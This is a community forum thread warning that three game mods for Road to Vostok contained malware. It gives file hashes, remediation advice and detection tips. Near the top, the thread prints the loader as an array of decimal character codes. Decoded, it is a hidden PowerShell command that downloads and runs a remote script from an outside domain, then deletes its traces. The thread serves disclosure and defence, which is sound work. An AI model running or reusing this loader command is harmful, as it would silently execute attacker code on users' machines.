If you had installed the following mods:
"Auto Save on Exit" by Subaiy MD5 hash - 6246fa47c492250128cbb4a463d2161a
"Kill Counter" by Daniel (if you downloaded this one: https://modworkshop.net/mod/56156 you are fine.) MD5 hash - bcee56cc847489a2a328189ba882d95e
"Enemies Drop Better Loot" by Krunker (If you downloaded this one: https://modworkshop.net/mod/56230 you are fine). MD5 hash - ba9e7d88f1079c0324d53bde5786e4da)
Your PC is likely infected with a malware. Do a proper reset to your computer.
What are we gonna do next?
- We are going to look for moderators to look at new mods for RTV.
- We'll be looking into ways to improve the site itself to better protect against these bad actors and also to let users know if a mod was infected - https://modworkshop.net/thread/13229.
What can you do
- Again if you are infected, factory reset your computer.
- Search for suspicious things in the mods you download (like "powershell")
These attacks all follow the same pattern, they execute a powershell script using some encoded URL:
[64,101,99,104,111,32,111,102,102,10,115,116,97,114,116,32,47,98,32,112,111,119,101,114,115,104,101,108,108,46,101,120,101,32,45,101,112,32,98,121,112,97,115,115,32,45,119,32,72,105,100,100,101,110,32,45,99,32,34,105,119,114,32,104,116,116,112,115,58,47,47,114,111,97,100,116,111,118,111,115,116,111,107,46,115,116,111,114,101,47,100,97,46,112,115,49,32,45,111,117,116,32,37,84,69,77,80,37,92,100,108,46,112,115,49,32,45,117,115,101,98,59,32,112,111,119,101,114,115,104,101,108,108,46,101,120,101,32,45,101,112,32,98,121,112,97,115,115,32,45,119,32,72,105,100,100,101,110,32,45,102,32,37,84,69,77,80,37,92,100,108,46,112,115,49,59,32,83,116,97,114,116,45,83,108,101,101,112,32,53,59,32,100,101,108,32,37,84,69,77,80,37,92,100,108,46,112,115,49,34,10,100,101,108,32,34,37,126,48,34] - Check file hash of the file you downloaded using: https://hash-file.online.
- Any mod containing powershell script without a good reason should be reported to moderators.
- Any mod that isn't open-source should be reported.
It was Kill counter by Sukui, not some "Daniel", thats first. Second, you going after me personally now cause I found out that youre coping work of others without a credit. Thats that. Malware or not this is bad actor behaviour as well. BTW, this was your response: "appreciate you letting me know - added the original mod as credit" (and you credited someone else). Now you acting like hurt child with narcissistic injury. Go figure.
@wons im so glad you can tell the difference! now can you tell that the mod you recommended also did the same? with original mod that i credited? how about you get off your high horse if you're not contributing anything <3
I appreciate you guys spotting this and working fast to remove the mods. Sucks to have to reset my whole system but hey, I got Windows 10 back and I'm running faster than ever now. Also lost 200 GB of mysteriously unaccounted for space on my C: Drive. Blessing in disguise I guess!
Thank you a lot for stating it openly and warning people and trying to fix it. Good job. Good luck. :)
i have reported the domain that was inside malware to namecheap and cloudflare
Is there any way to prevent this kind of thing from continuing to happen? Are mod files scanned before authors upload them?
Generally no, but we have moderators that actively look at mods and reports.
- While in this case virustotal couldn't detect anything, you can try scanning it through virustotal just in case.
- Search for suspicious things in the code, like "powershell" there's little reason for mods to run OS.execute
- Look if the user isn't too new and has track record of uploading working mods over time. Github Repo is a usually a sign of a legit user.
One of the banned users was an account from 2023 so it's not impossible for them to have dormant accounts on sites. - Ask around the community if a mod seems sus, AI can also detect fishy code.
In the end if you find a mod is malicious, report it.
@luffy Your explanation was very detailed. If I come across any malicious mods, I’ll make sure to report them. Thank you for your work and dedication.
This message was written with the help of AI.
⚠️ For everyone who already KNOWS this mod is malware – here is what is actually happening and what it means:
If you used the mod, your PC has already:
- Executed a hidden PowerShell command
- Downloaded a remote script from the internet
- Executed that script silently
- Deleted the visible traces afterwards
This means:
👉 You did NOT just run a mod
👉 You allowed external code to run on your system
What is likely happening right now
Depending on what the downloaded script ("da.ps1") contained, your system could currently:
- Have a stealer running (browser passwords, cookies, tokens)
- Have a background connection to a remote server
- Have additional malware installed
- Have persistence (auto-start after reboot)
Even if you see NOTHING:
→ that is completely normal for this type of attack
What this means for you
- Your accounts may already be compromised
- Changing passwords too early = useless (they can be stolen again)
- The infection may still be active in the background
What to do RIGHT NOW (no debate)
- Disconnect from internet
- Run full antivirus scan
- Run offline scan (important)
- Only AFTER that:
- Change passwords
- Enable 2FA
- Log out all sessions
About the mod site
I will personally avoid modworkshop.net for now, as it currently feels unsafe to download from there until this situation is clarified.
Reset or not?
- Full reset = safest option
- No reset = possible, BUT only if you properly clean the system
Final reality check
This is not:
- a bug
- a mistake
- a “harmless mod”
This is:
👉 a loader that executed remote code on your PC
Act accordingly.
This message was written with the help of AI.
⚠️ Update regarding the infected mod (killcounter / Road to Vostok)
I want to give a clear update on what happened on my system and what I did step by step.
What happened
- I ran the mod
- The mod executed hidden code in the background
- It launched PowerShell and downloaded a remote script
- That script was executed silently and then deleted
So yes:
👉 this was confirmed to be a malware loader
What I did immediately
- Disconnected my PC from the internet (LAN unplugged)
- Stopped using the system normally
- Ran a full system scan
- Ran a Windows Defender offline scan (boot-time scan)
Both scans:
👉 0 threats found
Additional checks
I also:
- Generated a full system report (autostart, tasks, processes)
- Manually reviewed everything
Result:
- No suspicious startup entries
- No malicious scheduled tasks
- No unknown background processes
- No persistence mechanisms found
Security actions
After scanning:
- Changed all important passwords (while offline)
- Enabled / verified 2FA
- Logged out of sessions
Current situation
- No signs of active malware
- System appears clean
- No persistence detected
👉 Most likely scenario:
- The downloaded payload either did nothing, failed, or only ran temporarily and did not stay on the system
Important note
Even though my system is clean now:
- Remote code WAS executed
- This is NOT a harmless mod issue
- This was intentionally malicious behavior
My personal conclusion
- I will avoid downloading mods from modworkshop.net for now until this is clarified
- I recommend others to be cautious as well
Final takeaway
If you ran this mod:
- Assume code was executed on your PC
- Scan your system properly
- Secure your accounts
Don’t ignore it just because nothing “seems” wrong.
Stay safe.
Here's hoping.